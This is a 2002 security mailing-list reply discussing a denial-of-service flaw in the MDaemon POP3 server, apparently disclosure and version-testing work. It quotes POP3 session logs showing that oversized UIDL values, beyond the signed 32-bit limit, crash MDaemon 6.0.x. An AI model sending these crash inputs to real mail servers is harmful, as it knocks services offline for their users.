I'm running MDaemon 3.1.2 and this does not have any adverse effect. Here's my log: +OK daisydata.com POP3 server ready <MDAEMON-F200210291127.AA274532MD3626@mydomain.com> USER myusername +OK myusername... Recipient ok PASS mypassword +OK myusername@mydomain.com's mailbox has 0 total messages (0 octets). UIDL 2147483647 -ERR no such message UIDL 2147483648 +OK -2147483648 UIDL 2147483649 +OK -2147483647 UIDL 2147483650 +OK -2147483646 And it responds to "QUIT" just fine. Bob Feldbauer wuher@swrpg.net > -----Original Message----- > From: Basil Hussain [mailto:basil.hussain@kodakweddings.com] > Sent: Tuesday, October 29, 2002 5:27 AM > To: bugtraq@securityfocus.com > Subject: RE: MDaemon SMTP/POP/IMAP server DoS > > > Hi all, > > > Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by > > sending long arguments (32b and above) with DELE or UIDL commands. > > To do this u must have at least mail-account on vulnerable host. > > After geting long request from client, all MDaemon's Services will be > > closed (smtp, imap, pop, (?)worldclient). > > Here the log of attack on local MDaemon POP-server: > > > > +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 > > <MDAEMON-F200210 > > 271036.AA3656130MD0012@dark.ru> > > USER D4rkGr3y > > +OK D4rkGr3y... Recipient ok > > PASS cool-pass > > +OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets). > > UIDL 11111111111111111111111111111111 > > It would appear this is not an issue with the length of string passed to > MDaemon, but rather an integer overflow problem. After some testing, I've > discovered that if you pass any number greater than 2147483647 (the limit > for a signed 4-byte integer), you either get an error or a > complete crash of > MDaemon. For example: > > +OK somedomain.com POP MDaemon 6.0.5 ready > <MDAEMON-F200210290951.AA5138234MD2795@somedomain.com> > USER blah > +OK blah... Recipient ok > PASS 123456 > +OK blah@somedomain.com's mailbox has 0 total messages (0 octets). > UIDL 2147483647 > -ERR no such message > UIDL 2147483648 > +OK -2147483648 !!! Index 0 is not used > UIDL 2147483649 > > [Connection lost at this point...] > > By the way, you may have noticed this also works with a slightly older > release (6.0.5). Also, hostname and account details have been changed to > protect the guilty... :-) > > Also, I don't know whether this was something with how my test W2K server > was set up, but MDaemon would auto-restart afterwards, thus > making this bug > not so much of a show-stopper and limiting scope for a Denial-of-Service > attack somewhat. > > Regards, > Basil Hussain
